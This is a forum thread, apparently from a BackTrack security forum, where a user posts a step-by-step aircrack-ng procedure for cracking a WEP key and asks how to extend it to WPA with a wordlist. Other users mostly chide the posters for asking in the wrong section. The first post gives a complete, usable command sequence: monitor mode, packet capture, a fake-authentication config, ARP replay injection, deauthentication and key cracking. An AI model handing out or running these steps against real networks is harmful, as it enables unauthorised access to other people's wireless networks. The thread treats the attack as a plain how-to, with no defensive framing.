Guys i have successfully cracked the wep key of my AP using this :
airmon-ng start wlan0
airodump-ng mon0
ctrl+c
airodump-ng -c 'AP Channel' -w 'filename' --bssid 'AP bssid' mon0
make a file in the root (destkop) fake.conf:
network={
ssid="SSID" <-- change this in your target ssid
key_mgmt=NONE
wep_key0="fakeauth"
}
wpa_supplicant -c fake.conf -i wlan0 -Dwext -B
aireplay-ng -3 -b 'AP bssid' mon0
aireplay-ng -0 1 -a 'AP bssid' mon0
aircrack-ng -b BSSID capfile-01.cap
But i am now trying to do it on a WPA encryption,as i understood from several posts, it uses the same commands except for the last one, we must add a List or library of words ...
Anyone knows anything?
*thinks*
isnt this the howto section?
This section is for providing a How-To, and not for requesting it.Isnt this the howto section?
Anyway, here are so many tutorials and How-To's about this topic, just use the search button and you will stumble on them....
Yes you're right there are about 10.000 of them...bad topic!Anyway, here are so many tutorials and How-To's about this topic,
www.myownremote.blogspot.com
No what I meant was he submitted a "howto" (if you could call it that) but also asked for help on it which doesnt really classify a howto.
I'm using intel(R) wireless wifi link 4965AGN with backtrack 4.. the command you posted in forum is it also applicable to my wireless card...? i try to post 1st because there's a lot of command i saw from net but it doesn't work, i don't know why, may be there is some thing wrong with that command... if it is ok for you to tell or tech me how, or proper command from airmon-ng till aircrack..
sorry for my english... hope u understand...
![]()
In this forum
...
search for video tutors
the procedures are the same
in some cases , certains wireless cards don't work
search for your model on google and site of the aircrack
You are posting in wrong section.read the title above which says "BackTrack 4 Howto Tutorials and Howtos about BackTrack 4 (NOT for requesting tutorials or how to do anything)" and always perform a search as this topic covered numerous times regarding capturing handshake & to crack using dictionary based attacks.
Remote Exploit Forums - Search Forums
Looking for 'Cracking WPA tutorials' is like looking for sand in the desert... Lol..
"If it's stupid but works, it's not stupid." - Murphy's Laws of combat, #2